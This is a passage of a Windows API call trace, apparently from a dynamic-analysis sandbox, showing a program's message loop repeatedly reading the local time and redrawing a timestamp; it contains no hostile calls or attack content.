- 1:49:37 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:37 PM", lprc=0x19f5bd) returned 13 [0107.282] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0107.282] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0107.282] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0107.282] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0107.282] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0107.282] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.299] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.299] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.299] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x28)) [0107.299] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x28)) [0107.299] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.309] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.309] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.309] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x32)) [0107.309] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x32)) [0107.309] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.333] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.333] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.333] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x4b)) [0107.333] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x4b)) [0107.334] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.344] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.344] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.344] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x55)) [0107.344] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x55)) [0107.344] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.354] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.354] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.354] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x5f)) [0107.354] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x5f)) [0107.354] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.383] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.383] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.384] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x7d)) [0107.384] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x7d)) [0107.384] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.389] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.389] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.389] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x82)) [0107.389] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x82)) [0107.389] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.412] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.412] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.412] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x99)) [0107.412] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x99)) [0107.412] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.422] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.422] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.422] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xa3)) [0107.422] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xa3)) [0107.422] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.433] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.433] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.433] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xae)) [0107.433] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xae)) [0107.433] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.449] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.449] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.449] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xbf)) [0107.450] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xbf)) [0107.450] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.469] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.469] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.469] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xd2)) [0107.469] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xd3)) [0107.469] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.490] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.490] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.490] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xe8)) [0107.490] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xe8)) [0107.491] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.500] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.500] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.500] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xf1)) [0107.500] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0xf1)) [0107.500] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.521] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.521] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.521] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x106)) [0107.521] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x106)) [0107.521] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.532] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.532] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.532] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x111)) [0107.532] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x111)) [0107.532] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.543] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.543] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.543] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x11c)) [0107.543] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x11c)) [0107.543] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.558] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.558] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.558] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x12b)) [0107.558] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x12b)) [0107.558] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.584] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.584] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.584] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x145)) [0107.584] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x145)) [0107.584] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.589] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.589] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.589] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x14a)) [0107.589] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x14a)) [0107.589] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.607] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.607] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.607] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x15c)) [0107.608] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x15d)) [0107.608] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.623] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.623] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.623] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x16c)) [0107.623] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x16c)) [0107.623] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.646] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.646] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.646] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x183)) [0107.647] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x184)) [0107.647] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.660] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.660] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.660] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x191)) [0107.660] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x191)) [0107.660] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.670] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.670] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.670] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x19b)) [0107.670] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x19b)) [0107.670] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.685] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.685] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.685] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x1aa)) [0107.685] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x1aa)) [0107.685] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.705] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.705] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.705] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x1be)) [0107.705] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x1be)) [0107.705] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.721] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.721] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.721] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x1ce)) [0107.721] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x1ce)) [0107.721] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.731] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.731] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.731] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x1d8)) [0107.731] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x1d8)) [0107.731] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.747] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.747] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.747] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x1e8)) [0107.747] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x1e9)) [0107.747] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.781] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.781] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.781] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x20a)) [0107.781] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x20b)) [0107.781] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.810] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.810] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.810] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x227)) [0107.810] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x227)) [0107.810] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.829] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.829] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.829] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x23a)) [0107.829] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x23a)) [0107.829] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.839] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.839] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.839] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x244)) [0107.839] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x244)) [0107.839] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.884] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.884] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.884] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x271)) [0107.884] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x271)) [0107.884] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.890] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.890] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.890] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x277)) [0107.890] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, 